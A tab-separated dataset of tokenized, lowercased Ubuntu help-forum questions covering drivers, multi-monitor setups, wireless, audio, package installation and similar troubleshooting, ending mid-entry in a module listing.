492912	using nvidia geforce 8600 gt and intel hd 4000 at same time	i have been running ubuntu in a vm at work for a while now to do my programming in and finally got sick of windows and decided to go full ubuntu . i ca n't seem to get my 3 monitors to work . when i first installed ubuntu all three monitors come on but you can tell no video drivers are installed because the mouse is blinking when you move it around and dragging windows is a little glitchy . so i searched for hours the other day and tried several things i found online with no success . i finally just reinstalled ubuntu and installed the nvidia geforce driver and i 'm just dealing with 2 monitors until i can figure out the fix for this . there has to be a simple solution to this that i am just failing to realize . i 'm running ubuntu 14.04 with nvidia geforce 8600 gt and intel hd 4000 . any help is greatly appreciated , thanks . note : i 'm also running the z77 extreme4 motherboard . the intel hd 4000 is the on board video . i had no problems in windows 8.1 getting all 3 monitors to work ( 2 on the nvidia card and 1 on the on board video ) .
492913	about the software fl sudio 11	i 've replaced my windows xp for ubuntu because my xp would not work , and that i replaced xp for ubuntu and all my files have including fl studio 11 . fl studio was the main program ii used to remix songs and themes , one of my favorites . the question : is there an fl studio 11 producer edition compatible for ubuntu that i can download and install again ? ? and then i can retrieve my things from image line i 've put this picture for it fl studio 11 producer edition
492914	ubuntu 14.04 install problem	after installing ubuntu 14.04 and entering my password the screen freezes . i have tried reinstalling a few times , but the same thing happens . any ideas ? please help urgently .
492915	ubuntu 14.04 and google chrome with touchscreen , no left click	i am using the latest version of chrome with 64bit 14.04 running on my sony vaio tab duo 11 . i am trying to use the touchscreen and everything looks great , scrolling is very nice , i can swipe to go back a page , hard press to right click , all the touch events are working . the only thing which isnt working , and it is rather important is left click . if i ta on a link or anything , it simply moves the mouse to hover over it and not click it , i can not select a place to enter text either , because my finger is unable to click . xinput list gives ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ crucialtek co. , ltd optical track pad id=10 [ slave pointer ( 2 ) ] ⎜ ↳ n-trig duosense pen id=13 [ slave pointer ( 2 ) ] ⎜ ↳ n-trig duosense id=14 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ video bus id=6 [ slave keyboard ( 3 ) ] ↳ sony vaio keys id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ usb2.0 camera front id=9 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=11 [ slave keyboard ( 3 ) ] ↳ usb2.0 camera rear id=12 [ slave keyboard ( 3 ) ] i have tried google-chrome -- touch-devices= ( 10,14,13,4 , i have tried them all ) i have also gone into chrome : ///flags and enabled the touch events and the various touch things , disabled them , tried different combinations , and yet still nothing thank you
492920	does apt 1.0 supports search patterns like aptitude ?	aptitude search ~ipackage will search for installed package only . can apt 1.0 ( i.e . standalone apt , not apt-cache , dpkg or any else ) do that ?
492921	gui not launching in tinycore	i 'm trying to run tinycore , but it never boots into flwm and i 'm left in command line . i tested the solutions in the faq http : //distro.ibiblio.org/tinycorelinux/faq.html # xsetup but it has n't worked for me so far . however it states that my `` last resort '' is the xorg extension , however i ca n't find out how to install or run xorg . i 'm new to linux and i 'm trying to run tinycore on a very low specced laptop . xubuntu was running ok but it stopped the fan and lubuntu is barely useable . both installs took about 24h so i wo n't be doing any others in case i do n't get tinycore to work : /
492922	preventing 'read-only ' error in usb pen drive	i work extensively on both windows 7 and ubuntu and use a usb pen drive to transfer data , python files , etc . between these oss . recently my usb pen drive has been giving me 'read-only ' errors such as error while creating directory untitled folder . there was an error creating directory in /media/tsb usb drv error creating directory : read-only file system i 've browsed through some related pages like this and this . the problem was fixed by copying everything from usb to windows pc , reformatting usb then putting everything back on to the usb . my question is : is there a way to avoid this problem in the future ? i know that whenever i stick the usb into a windows pc , i have the option of checking for errors , so is this procedure sufficient ?
492923	pptpd vpn : no internet access after connecting	i 've followed the instructions in this tutorial to set up a vpn server , so that i can connect to that and surf the internet virtually from another location . so far from windows , i can connect to it but there is no internet access . the ip addresses that i used in the conf file is exactly the same as in the tutorial localip 192.168.0.1 remoteip 192.168.0.100-200 same for the dns which is 8.8.8.8 . ( everything you need to know about what i 've done is already in that link ) what do you think could be the problem ?
492927	what is wrong with the browser surf ?	so i downloaded surf from the ubuntu repository and compiled it from source . but every time i launch it i only get a blank white screen . any suggestions would be helpful . maybe i 'm missing some dependencies or something like that ?
492929	update manager tried to install older kernel 3.2.0.65 when 3.2.0.66 is already installed	yesterday , then again today , update manager wanted to install kernel 3.2.0.65 , when i already have 3.2.0.66 installed and working in my 12.04 ubuntu installation . what 's going on ? clarification : i install all applicable updates via the update-manager as they come up . that 's how 3.2.0.66 was installed . i do n't want to remove anything , i just do n't want update-manager to install an older kernel , or if for some reason that should be done , i 'd like to know why . usually , i just install whatever i need to stay up-to-date . now i have to uncheck 3.2.0.65 kernel , headers , etc . updates every time update manager comes up . i 'd like to know why this is happening , and how to correct it so it does n't happen any more .
492930	sharing wlan1 connection on ubuntu 14.04 with eth0 connection	my ubuntu 14.04 machine has a static ip address of 192.168.0.22 . my slackware machine is 192.168.0.1 . when ubuntu was 12.04 , and i would plug in the wireless lan adapter , i could use the single connection for both machines . i could also share the usb printer located on the ubuntu machine . with the newer ubuntu software , i was stymied . can someone suggest a solution ?
492933	how to install freegate in ubuntu 14.04	i installed tor with sudo apt-get install tor and then run it with sudo killall tor and config that with my browser but it does n't work ... now i want to try freegate on my ubuntu 14.04. would you please tell me how to install freegate on that ?
492934	compiz magnifier not working on kde	i have ubuntu 14.04 and just switched from unity to kde ( kubuntu-desktop ) . i use compiz magnifier when reading and it works on unity but not on kde . i like kde better and it 's annoying to switch back to unity just to read . does anyone know if there 's any particular issue with compiz on kde ? i 'm using the same settings on kde and unity
492937	ubuntu 14.04 ethernet slow	hey since this morning my ubuntu 14.04 ethernet connection is really slow but the strange thing is i have a hotspot in my machine and the phone connected to it has fast internet ... ... ... . i really donâ´t remember that i changed something to my system i am confused as tux . how do i fix this my ethernet details description : ethernet interface product : ar8151 v2.0 gigabit ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:05:00.0 logical name : eth0 version : c0 serial : 14 : da : e9 : ab:36 : dc size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.1-napi duplex=full ip=192.168.1.8 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:58 memory : dc800000-dc83ffff ioport:9000 ( size=128 )
492938	skype 4.3 in repositories	why is not the recent skype version 4.3 for linux available in the partner repository ? when will it come there ? as far as i know , software installation via repositories is preferred over installation of standalone packages .
492939	[ 14.04 ] [ kvm ] windows 2008 r2 sp1 virtio 0.1-81 : becomes slow unexpectedly , cpu 100 %	ubuntu 14.04 server kvm 1.0.3 virtio 0.1-81 windows 2008 r2 sp1 on guest becomes slow unexpectedly . ubuntu 14.04 server qemu-kvm 2.0.0+dfsg-2ubuntu1 . amd64 libvirt-bin 1.2.2-0ubuntu13.1 linux 3.13.0-30-generic # 55-ubuntu smp sysctl.conf kernel.sched_min_granularity_ns=10000000 kernel.sched_wakeup_granularity_ns=15000000 vm.dirty_ratio=10 vm.dirty_background_ratio=5 vm.swappiness=10 kern.timecounter.hardware=acpi-fast win2k8r2.xml ... core2duo intel
492941	installing vmware tools on ubuntu host ?	i'am running ubuntu 14.04 64 bit and i 'm using vmware player to run windows 7 32 bit as guest with vmware tools installed . i cant get the shared clipboard to run ! i had made some researches i found that i must also install vmware tools on the host ( which is ubuntu ) how can i install vmware tools on ubuntu 14.04 ? i tried to download the deb package from vmware website but i did n't find a version for 14.04 when i browsed older version of ubuntu i found a bout 30 .deb packages i do n't know which i must download any ideas ?
492943	sqlite3 on precise pangolin : installed but not found ?	vagrant @ precise64 : ~ $ sudo apt-get install sqlite3 reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libsqlite3-0 suggested packages : sqlite3-doc the following new packages will be installed : sqlite3 the following packages will be upgraded : libsqlite3-0 1 upgraded , 1 newly installed , 0 to remove and 147 not upgraded . need to get 375 kb of archives . after this operation , 174 kb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main libsqlite3-0 amd 64 3.7.9-2ubuntu1.1 [ 349 kb ] get:2 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main sqlite3 amd64 3 . 7.9-2ubuntu1.1 [ 26.8 kb ] fetched 375 kb in 0s ( 413 kb/s ) ( reading database ... 59795 files and directories currently installed . ) preparing to replace libsqlite3-0 3.7.9-2ubuntu1 ( using ... /libsqlite3-0_3.7.9-2 ubuntu1.1_amd64.deb ) ... unpacking replacement libsqlite3-0 ... selecting previously unselected package sqlite3 . unpacking sqlite3 ( from ... /sqlite3_3.7.9-2ubuntu1.1_amd64.deb ) ... processing triggers for man-db ... setting up libsqlite3-0 ( 3.7.9-2ubuntu1.1 ) ... setting up sqlite3 ( 3.7.9-2ubuntu1.1 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place vagrant @ precise64 : ~ $ sqlite **the program 'sqlite ' is currently not installed . ** you can install it by typing : sudo apt-get install sqlite vagrant @ precise64 : ~ $ cd .. vagrant @ precise64 : /home $ cd .. vagrant @ precise64 : / $ sqlite the program 'sqlite ' is currently not installed . you can install it by typing : sudo apt-get install sqlite vagrant @ precise64 : / $ pwd / vagrant @ precise64 : / $ cd etc vagrant @ precise64 : /etc $ sqlite the program 'sqlite ' is currently not installed . you can install it by typing : sudo apt-get install sqlite vagrant @ precise64 : /etc $ cd .. vagrant @ precise64 : / $ cd var vagrant @ precise64 : /var $ sqlite the program 'sqlite ' is currently not installed . you can install it by typing : sudo apt-get install sqlite vagrant @ precise64 : /var $ find sqlite find : `sqlite ' : no such file or directory vagrant @ precise64 : /var $ find sqlite3 find : `sqlite3 ' : no such file or directory vagrant @ precise64 : /var $ wtf ? thx .
492944	audio jack not outputing with sound blaster recond 3di 14.04	so i have been using ubutu for a couple week but i keep coming across a reocuring problem of no sound output through my jacks . the internal speakers work and when i am in windows everything works fine . as it states before i am using a sound blaster recon 3di . working on an alienware mx14 r2
492945	installing from tar.gz permission denied	total linux noob . i have worked in the wintel world as a network/sys admin for going on twenty years . its time for me to get my feet wet with ubuntu . let me preface this with the following : i have googled this and just ca n't make any head way . each question just leads me into another rabbit hole . i have looked and looked and keep getting frustrated . so please forgive my noob question ( s ) . i am attempting to install openfire from tar.gz without success . i saved the archive to my desktop and am attempting to unzip the folder ( s ) to either /opt or /usr/bin as indicated by the of documentation . i keep getting permission denied . is this something you can help with ? using desktop version 12.04 lts inside oracle virtualbox most current release . thanks for any info .
492947	zip all files in a directory individually and password protect them .	i 'm using an ubuntu system to download suspicious/suspected malware files for analysis . i need to zip each file and password protect it to prevent accidentally infecting other systems when transferring the files . the
492949	what happens if grub-pc package is not installed ? the sustem could boot ?	what happens if grub-pc package is not installed ? the sustem could boot and reboot ? i 'm having some troubles with upgrading my ubuntu 12.04 lts server and when i executing apt-get upgrade command show the next error when grub-pc is installing : error : physical volume pv0 not found and i 'm afraid to reboot the system and will get that the server does not reboot correctly . any could help me ? regards , francisco
492951	how to safely upgrade deja dup on ubuntu 12.04 ?	i am currently running ubuntu 12.04 , with deja dup 22.0 . i would like to update deja dup to later releases so i can utilize the integrity check feature for the backups , as suggested here : ( how can i test the integrity of a backup made with backup ( deja dup ) ? ) however apt-get install -- only-upgrade deja-dup , states that i already have the newest version ( 22.0 ) . what is the optimal way to safely upgrade deja dup to newer versions on ubuntu 12.04 ?
492952	what encryption and authentication algorithms does vsfpd use by default ?	i have followed this guide and was able to transfer files using sftp , i want to know the encryption and authentication algorithms used by default in that file transfer .
492953	is the out-of-the-box ubuntu 14.04 wacom tablet application complete ?	specs : i have recently installed ubuntu 14.04 on my lenovo yoga 2 pro and have just purchased a wacom intuos pro ( medium ) so that i can work my art digitally rather than on canvas . before even plugging in the tablet , i did hours of google-ing and reading to find out how i should install and configure the wacom software . i finally decide to just plug it in and i find that there is already a wacom tablet application , ( accessed by command terminal or just in by super button in applications ) . however , it does not seem to have all the functionality according to the intuos pro user 's manuel . i then went to the linux wacom project website and tried to configure the tarball download to see if this would improve functionality . their download does not work out of the box because ubuntu is missing some dev applications which are explained at this forum post : https : // help.ubuntu.com/community/wacom/latestdriver ( i ca n't post links yet sorry ) . it first did not recognize the pkg_cofig_path ( error message ) : consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables xorg_cflags and xorg_libs to avoid the need to call pkg-config . see the pkg-config man page for more details . which i fixed with : which pkg-config export pkg_config_path=/usr/bin/pkg-config the directions under `` compiling driver manually '' section , tried account for these apps missing out-of-the-box : no package 'xorg-server ' found no package 'xproto ' found no package 'xext ' found no package 'kbproto ' found no package 'inputproto ' found no package 'randrproto ' found **the build-dep wacom-tools is out of date by the way , i used : sudo apt-get install build-essential sudo apt-get install xserver-xorg-dev sudo apt-get install xorg-dev i was still missing libudev : sudo apt-get install libudev-dev it configured after that ( ./configure ) and i successfully installed the linux wacom download , which still does not have all the normal abilities . i still have to test it again in my different drawing apps , but this download did n't seem to have any effect actually . is the ubuntu 14.04 support for wacom simply incomplete ? are there any other drivers out there that have the missing functionality ? i seem to be missing nearly all the control panel function listed on pages 40-44 of the user manual http : // us.wacom.com/~/media/files/manuals/intuosprousersmanual.pdf/ specifically : the main control panel modifier precision mode mode toggle ink toggle open/run pressure hold sorry for such the long post , it just an expensive ( and extremely useful tool -- at least on my friend 's mac ) and i am very excited to use it . it is hard to believe that given all the details , the information i need is n't out there somewhere . any links or suggestions would be very welcome . if it 's not built yet , maybe i can help build it some day when i am good enough .
492957	installing x.org ( opensource ) ubuntu driver in the terminal	software center messed up my proprietary driver installation and i must revert to the original driver ( the one you can find in `` additional drivers '' tab under software sources . however software center corrupted my video driver and software sources does not allow me to revert or change anything . completely removing the proprietary driver leaves me with a corrupted x.org and does not work . where can i download an exact copy of the `` x.org amd display wrapper '' and install it because right now i have no gui .
492958	`` 3d '' graphics not working in civ5 via steam -- how to fix ?	i 've just downloaded civ5 , which is finally available for linux . i 'm getting an annoying graphics issue however -- the terrains , which should be 3d , are n't really being rendered . how do i fix this ? i 'm running a thinkpad x230 with ubuntu 13.10 when i run lspci | grep vga , i get 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) here is a screenshot of the problem : http : //imgur.com/yn4mxtx those grey and white blobs should look like mountains , and the north coast tiles there should n't have that residue on the water tiles . also , that river should be on the border of the tiles , not in the middle of them .
492959	problems with file permissions in ubuntu 14.0	good afternoon to all here i have a problem with permissions , use ubuntu 14.0 configured with samba . the details are in the following example : there is a folder called `` isolated '' contains folders and files , to which i gave 775 permissions for admin user and design group . we user1 , user2 and user3 i added to the design group . the 3 users enter that folder and can view and modify the contents , so good , but if someone creates a new one ... that file is created with the owner and group of the user , then others can not edit it for lack permission . would i could help move you to do the samba configuration file to create a new file to not go with the owner-user group ?
492960	wifi is disabled by hardware switch - compaq 610	after installing ubuntu 14.04 the wireless switch in the laptop is not getting switched on . it was working fine with windows8 earlier . here are some additional info rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : yes lspci -nn | grep -i network 10:00.0 network controller [ 0280 ] : intel corporation pro/wireless 3945abg [ golan ] network connection [ 8086:4222 ] ( rev 02 ) sudo rfkill unblock all ( or wifi ) is not working , i tried many times using it .
492971	how to share cable internet between a pc and an iphone ?	i have cable internet , and unfortunately only my pc can use it . i would like to make it so that my iphone can also use it . i have ubuntu 14.04 lts and an iphone 4 . thanks !
492974	dual display detected but not working after startup 14.04	here 's my situation -- i 've got an hp envy laptop running 14.04 with an amd a10 apu . catalyst display dashboard and the works are installed . as the system boots up , it acknowledges the external display ( via hdmi connection ) and things seem normal . however , right after logging into the system , the external display shuts off . even stranger , when i click on the display settings in settings , it actually knows there 's an external monitor attached . but no signal is going toward the external display . more frustratingly , when i log into the administrative version of the catalyst control center , it wo n't even detect the second display . anybody have anything on this ? it 's extremely frustrating and i really need two displays for my photo editing and i love using it for remote sessions . thanks a bunch in advance . by the way : 8 gb ddr3 ram 1 tb hdd ubuntu 14.04 latest amd drivers for the a10 apu
492979	remove grub boot selecting after windows is gone	i 've been looking for this answer quite a while in the last few days , but all google and question searches here seem to retrieve are for removing grub and restoring windows 's bootloader after deleting ubuntu from a dual-box . my case is the opposite : i had a dual box and decided to remove windows ; i 've already removed the partition and merged it accordingly with ubuntu 's , and i 'm not having problems with booting my ubuntu . still , i would like to remove the grub selection screen when i turn on my laptop , so that it goes straight into ubuntu ; so far i 've tried updating the grub with sudo update-grub and it only removed the now unexistant-windows entries . can i get some guidance on the process please ? thanks in advance
492980	ca n't open .inf files in ubuntu 14.04	i was trying to play a movie in the movie player , but ubuntu replied with the error that the .inf file that told the disc how to play the movie could n't be read . windows is not working right now . anything i can use to read the file ? i have wine installed , in case that can do anything .
492981	how do i determine and fix why i can not output lpcm from xbmc ?	i have a fresh installation of ubuntu 14.04 on an intel motherboard with realtek alc662-vc-based audio . i want to output lpcm no matter what audio format xbmc encounters , but lpcm is not a choice . i believe i may be missing the proper codecs and/or drivers , but do n't know how to narrow down the problem and fix it . i do not think this is a problem related to xbmc , because windows installation on the same machine has the option available ... cat /proc/asound/cards 0 [ mid ] : hda-intel - hda intel mid hda intel mid at 0xfe420000 ira 45 lspci -v 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) subsystem : intel corporation device 0038 flags : bus master , fast devsel , latency 0 , irq 45 memory at fe420000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel lsmod | grep snd snd_hda_codec_hdmi 46207 1 snd_hda_codec_realtek 61438 1 snd_hda_intel 52355 0 snd_hda_codec 192906 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel snd_hwdep 13602 1 snd_hda_codec snd_pcm 102099 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel snd_page_alloc 18710 2 snd_pcm , snd_hda_intel snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi snd_rawmidi 30144 1 snd_seq_midi snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 29482 2 snd_pcm , snd_seq snd 69238 11 snd_hda_codec_realtek , snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi soundcore 12680 1 snd aplay -l **** list of playback hardware devices **** card 0 : mid [ hda intel mid ] , device 0 : alc662 rev1 analog [ alc662 rev1 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : mid [ hda intel mid ] , device 1 : alc662 rev1 digital [ alc662 rev1 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : mid [ hda intel mid ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 one final thought , the motherboard has a display port connector vs. an actual hdmi connector .
492988	lost visual interface	i am new to ubuntu , and am using it on a parallels virtual machine . i performed package updates using `` apt-get upgrade '' only to get a black screen and the task bar ( which did n't open any applications ) . i then shut down the machine , turned off 3d acceleration , turned it back on , turned it off , turned on 3d acceleration and turned the machine on . this led me to the exact opposite of what i had . i have a desktop and can turn on applications , but there is no task bar and no visual interface ( nothing around the terminal window that allows me to drag it ) . i tried : dconf reset -f /org/compiz/ then unity -- reset-icons & disown and got this : ( process:2408 ) : glib-gio-warning ** : g_settings_set_value : value for key 'visual-bell-type ' in schema 'org.gnome.desktop.wm.preferences ' is outside of valid range ( process:2408 ) : glib-gio-warning ** : g_settings_set_value : value for key 'visual-bell-type ' in schema 'org.gnome.desktop.wm.preferences ' is outside of valid range ( process:2408 ) : glib-gio-warning ** : g_settings_set_value : value for key 'visual-bell-type ' in schema 'org.gnome.desktop.wm.preferences ' is outside of valid range thanks for your help !
492990	how to install linux leaveing my data intact	greeting , here is what i wanne do in a nutshell , i hava 2 partitions c : / and d : / and i want to install the latest debian as dual boot with windows basically i want to shrink my c : / drive and give debian a 50 ~ 100 gig > > ( 1 - is that enough ) problem is : after i shrink my c : / or d : / drive leaveing about 100 g for the installation i dont want to lose any data i dont really fully understand the partitioning method so , it would be great if any one could help my out ? thanks ..
492992	dovecot not respecting conf.d settings	i am trying to setup dovecot according to a guide . i am trying to disable pop3 and change the certificate locations , however changing 01-mail-stack-delivery.conf does not seem to make a difference . changing 10-ssl.conf and 20-pop3.conf individually does not change anything either . do i have to enable the conf.d folder somewhere ? i am using service dovecot restart to restart dovecot and dovecot -n to view the current settings .
492995	help . i installed gnome on my computer and now i would like to uninstall it since now i have cinnamon .	problem is i havent been able to delete it . i dont remember how i installed it but now i would just like to get rid of it . fyi . im using a laptop with ubuntu 14.04
492997	firefox will play videos of this website but chromium wo n't	the website is sbs ondemand in australia . when there is a program that i want to watch , i know that it wo n't work in chrome , wo n't work in chromium , probably will work in firefox , and when firefox does n't work , i use chrome in windows xp in virtualbox ( which also , very occasionally , wo n't play the video ) . the website video uses adobe flash player . the browsers use the following versions of flash player : firefox : 11.2.202.378 chromium : 13.0.0.206 chrome : 14.0.0.125 virtualbox > windows xp > chrome : 14.0.0.125 why would firefox ( using older version of flash player ) work , while chromium and chrome do n't ? i ask this question purely out of curiosity . it 's been occurring for a year or two on several different computers using various linux distros , so i 'd love to get to the bottom of it . my main computer uses ubuntu 14.04 .
493001	is it a good idea to install propriatery drivers ?	a few hours ago i installed 14.04 ubuntu and configured it for 2 hours and it just crashed and ran in low graphics mode . i was unable to fix this by ( got very tired of it ) and i just reinstalled it . now i am afraid of the same mistake - should you , or should you not install propriatery nvidia drivers ?
493002	global sudo session in ubuntu	is is possible to keep the sudo session for sometimes ? i mean when you open synaptic , each time you have to authenticate . in a single terminal , sudo session exits for a specific amount of time . you do n't need to authenticate each time you run something with sudo . also user account ( system settings ) has this feature ( unlock ) . can we do it system wide ? i do n't recommend to disable password or login as root . thanks in advance .
493004	how can i make the login screen appear instead of logging me in automatically ?	my ubuntu logs me directly into my desktop , but is not showing the login screen . i have 14.04 lts so i want to select kde , but my system boots to the desktop directly . any way to go to the login screen so that i can log in as usual ?
493008	installed a software from source code , how to uninstall it ?	recently i 've been doing some reading on ffmpeg , and so i was told that ffmpeg served by the ubuntu official repository is outdated . i followed the official ffmpeg installation guide , and managed to get the ffmpeg installed successfully on my machine . the question is , if i decided to remove/uninstall the ffmpeg , how do i do that ? sudo apt-get remove ffmpeg ? locate the binary with which ffmpeg and delete it ? thanks a bunch !
493010	trying to change desktop environment but stuck on log in screen .	im currently running lubuntu and was trying to try out gnome . now im in the log in screen and changed it to gnome in the top right hand corner . i proceed to log in but the screen goes black and the lubuntu log in screen just appears again . any help would be greatly appreciated .
493016	is it possible to assign a shortcut to `` switch account '' in the login screen of ubuntu 14.04 ?	since i have this problem which is described here . and since the only solution i have for now is to click the `` switch account '' option from the login screen in order to log into my session without getting the `` password incorrect '' error then i 'm looking for a way to assign a shortcut key to this option , is that possible ? edit # 1 : once i created the keyboard shortcut , how can i assign a key mapping to it ? as it says in the bottom of the window , i clicked the switch-account row but when i do a key sequence nothing happens :
493018	tata photon max wi-fi data card is not working in ubuntu 14.04 lts . please help !	i am using ubuntu 14.04 lts . i have tata photon max wifi data card . it was working when i installed it . it was randomly working after that . but , after installing updates it is not working at all . please provide some solution .
493020	ubuntu 12.04 wireless constantly prompts for password with intel 7260 and backports 3.11	when i first got my laptop i had the same problem as described in no wireless for intel corporation 7260 version 63 . i followed the instructions and everything worked perfectly for several months . a few weeks ago i suddenly lost the ability to connect to my router , with the wireless icon stuck in the `` connecting '' animation and the password prompt repeatedly coming up . i am still able to connect fine using windows on the same laptop and with my mac . i 've tried installing newer versions of the backports , to no effect . here 's some information about my setup . $ uname -a linux l-i7537 3.8.0-38-generic # 56~precise1-ubuntu smp thu mar 13 16:22:48 utc 2014 x86_64 x86_64 x86_64 gnu/linux $ lspci | grep wireless 02:00.0 network controller : intel corporation wireless 7260 ( rev 73 ) $ lsmod | grep iwl filename : /lib/modules/3.8.0-38-generic/updates/drivers/net/wireless/iwlwifi/iwlwifi.ko version : backported from linux ( v3.16-rc1-0-g7171511 ) using backports v3.16-rc1-1-0-g04d6077 license : gpl author : copyright ( c ) 2003- 2014 intel corporation < ilw @ linux.intel.com > version : in-tree : d description : intel ( r ) wireless wifi driver for linux firmware : iwlwifi-100-5.ucode firmware : iwlwifi-1000-5.ucode firmware : iwlwifi-135-6.ucode firmware : iwlwifi-105-6.ucode firmware : iwlwifi-2030-6.ucode firmware : iwlwifi-2000-6.ucode firmware : iwlwifi-5150-2.ucode firmware : iwlwifi-5000-5.ucode firmware : iwlwifi-6000g2b-6.ucode firmware : iwlwifi-6000g2a-5.ucode firmware : iwlwifi-6050-5.ucode firmware : iwlwifi-6000-4.ucode firmware : iwlwifi-7265-9.ucode firmware : iwlwifi-3160-9.ucode firmware : iwlwifi-7260-9.ucode firmware : iwlwifi-8000-8.ucode srcversion : 9e8cd8b5cabfcd8ff940d28 alias : pci : v00008086d000024f4sv*sd00000030bc*sc*i* alias : pci : v00008086d000024f3sv*sd00000010bc*sc*i* alias : pci : v00008086d0000095asv*sd00005490bc*sc*i* alias : pci : v00008086d0000095bsv*sd00005290bc*sc*i* alias : pci : v00008086d0000095asv*sd00005590bc*sc*i* alias : pci : v00008086d0000095asv*sd00005190bc*sc*i* alias : pci : v00008086d0000095asv*sd00005090bc*sc*i* alias : pci : v00008086d0000095asv*sd00005420bc*sc*i* alias : pci : v00008086d0000095asv*sd0000502abc*sc*i* alias : pci : v00008086d0000095asv*sd00005020bc*sc*i* alias : pci : v00008086d0000095asv*sd00009410bc*sc*i* alias : pci : v00008086d0000095asv*sd00009310bc*sc*i* alias : pci : v00008086d0000095asv*sd00009510bc*sc*i* alias : pci : v00008086d0000095asv*sd00009200bc*sc*i* alias : pci : v00008086d0000095asv*sd00009210bc*sc*i* alias : pci : v00008086d0000095asv*sd00009112bc*sc*i* alias : pci : v00008086d0000095asv*sd00009110bc*sc*i* alias : pci : v00008086d0000095asv*sd00009012bc*sc*i* alias : pci : v00008086d0000095asv*sd00009010bc*sc*i* alias : pci : v00008086d0000095bsv*sd00005202bc*sc*i* alias : pci : v00008086d0000095asv*sd00005102bc*sc*i* alias : pci : v00008086d0000095asv*sd00005002bc*sc*i* alias : pci : v00008086d0000095bsv*sd00005200bc*sc*i* alias : pci : v00008086d0000095asv*sd0000500abc*sc*i* alias : pci : v00008086d0000095asv*sd00005000bc*sc*i* alias : pci : v00008086d0000095asv*sd00001010bc*sc*i* alias : pci : v00008086d0000095asv*sd00005400bc*sc*i* alias : pci : v00008086d0000095asv*sd00005410bc*sc*i* alias : pci : v00008086d0000095asv*sd00005412bc*sc*i* alias : pci : v00008086d0000095asv*sd00005012bc*sc*i* alias : pci : v00008086d0000095bsv*sd00005210bc*sc*i* alias : pci : v00008086d0000095bsv*sd00005302bc*sc*i* alias : pci : v00008086d0000095bsv*sd00005310bc*sc*i* alias : pci : v00008086d0000095asv*sd00005100bc*sc*i* alias : pci : v00008086d0000095asv*sd00005110bc*sc*i* alias : pci : v00008086d0000095asv*sd00005010bc*sc*i* alias : pci : v00008086d000008b3sv*sd00001170bc*sc*i* alias : pci : v00008086d000008b3sv*sd00001070bc*sc*i* alias : pci : v00008086d000008b3sv*sd00008570bc*sc*i* alias : pci : v00008086d000008b3sv*sd00008470bc*sc*i* alias : pci : v00008086d000008b4sv*sd00008270bc*sc*i* alias : pci : v00008086d000008b3sv*sd00008062bc*sc*i* alias : pci : v00008086d000008b3sv*sd00008060bc*sc*i* alias : pci : v00008086d000008b3sv*sd00008172bc*sc*i* alias : pci : v00008086d000008b3sv*sd00008170bc*sc*i* alias : pci : v00008086d000008b3sv*sd00008072bc*sc*i* alias : pci : v00008086d000008b3sv*sd00008070bc*sc*i* alias : pci : v00008086d000008b4sv*sd00000370bc*sc*i* alias : pci : v00008086d000008b3sv*sd00000472bc*sc*i* alias : pci : v00008086d000008b3sv*sd00000470bc*sc*i* alias : pci : v00008086d000008b4sv*sd00000272bc*sc*i* alias : pci : v00008086d000008b4sv*sd00000270bc*sc*i* alias : pci : v00008086d000008b3sv*sd00000062bc*sc*i* alias : pci : v00008086d000008b3sv*sd00000060bc*sc*i* alias : pci : v00008086d000008b3sv*sd00000172bc*sc*i* alias : pci : v00008086d000008b3sv*sd00000170bc*sc*i* alias : pci : v00008086d000008b3sv*sd00000072bc*sc*i* alias : pci : v00008086d000008b3sv*sd00000070bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c420bc*sc*i* alias : pci : v00008086d000008b2sv*sd0000c220bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c02abc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c020bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c360bc*sc*i* alias : pci : v00008086d000008b2sv*sd0000c370bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c560bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c570bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c462bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c460bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c472bc*sc*i* alias : pci : v00008086d000008b1sv*sd0000c470bc*sc*i* alias : pci : v00008086d000008b2sv*sd0000c262bc*sc*i* alias : pci : 